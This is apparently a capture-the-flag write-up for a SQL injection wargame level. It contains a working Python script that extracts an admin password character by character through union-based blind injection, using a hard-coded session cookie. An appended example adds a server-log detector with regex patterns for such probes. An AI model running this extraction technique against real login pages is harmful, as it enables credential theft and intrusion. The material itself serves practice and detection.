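In this challenge, the if statement was blocked.
So I searched around and found a way to tell the false case from the true case using union.
Using this, I solved it in much the same way as the previous challenge.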
```python
import requests

url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID': '25g6h0pbijn3arrdalpfkie222'}

'''
?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20length(pw)=8%20union%20select%201)--%20-
'''
# The subquery yields one row when the comparison is true (1 union 1) and two
# rows when it is false (0 union 1). The script treats a response that
# contains "query" as the true case.

# get length
length = 0
for i in range(1, 100):
    rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20length(pw)=" + str(i) + "%20union%20select%201)--%20-", headers=headers, cookies=cookies)
    text = rs.text
    if "query" in text:
        print("find it length = " + str(i))
        length = i
        break

# get each character of pw, one position at a time
for i in range(1, length + 1):
    for c in range(33, 255):
        rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20ord(substr(pw, " + str(i) + ",1))=" + str(c) + "%20union%20select%201)--%20-", headers=headers, cookies=cookies)
        text = rs.text
        if "query" in text:
            print(str(i) + " find it " + str(c) + " " + chr(c))
            break
```
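How a loop like the one above looks from the server side, as an added example that is not part of the original post: it URL-decodes each logged request, replaces every number with `N`, and flags a client that sends many requests differing only in their numbers. The log format, the `/login.php` path, the IP addresses and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" \d{3} \d+')
# SQL constructs used by the probes in this write-up.
SQL_HINT = re.compile(r"\b(union\s+select|substr\s*\(|ord\s*\(|length\s*\()", re.I)


def find_blind_sqli(lines, min_variants=10):
    """Return {(client, template): variant_count} for suspected blind extraction.

    A template is the decoded request with every number replaced by 'N', so all
    requests of one guessing loop collapse into a single key.
    """
    variants = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a GET line in the assumed format
        client, target = m.group(1), unquote_plus(m.group(2))
        if not SQL_HINT.search(target):
            continue
        template = re.sub(r"\d+", "N", target)
        variants[(client, template)].add(tuple(re.findall(r"\d+", target)))
    return {k: len(v) for k, v in variants.items() if len(v) >= min_variants}


def sample_log():
    """Constructed log lines: one guessing loop plus ordinary traffic."""
    probe = ("/login.php?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20"
             "ord(substr(pw,%201,1))={}%20union%20select%201)--%20-")
    fmt = '203.0.113.7 - - [27/Sep/2018:10:00:{:02d} +0900] "GET {} HTTP/1.1" 200 {}'
    lines = [fmt.format(i, probe.format(33 + i), 512 if i == 20 else 0)
             for i in range(30)]
    lines.append('198.51.100.4 - - [27/Sep/2018:10:01:00 +0900] '
                 '"GET /login.php?pw=hunter2 HTTP/1.1" 200 512')
    lines.append('198.51.100.4 - - [27/Sep/2018:10:01:05 +0900] '
                 '"GET /board.php?page=2 HTTP/1.1" 200 2048')
    return lines


if __name__ == "__main__":
    for (client, template), count in find_blind_sqli(sample_log()).items():
        print(client, count, template)
```
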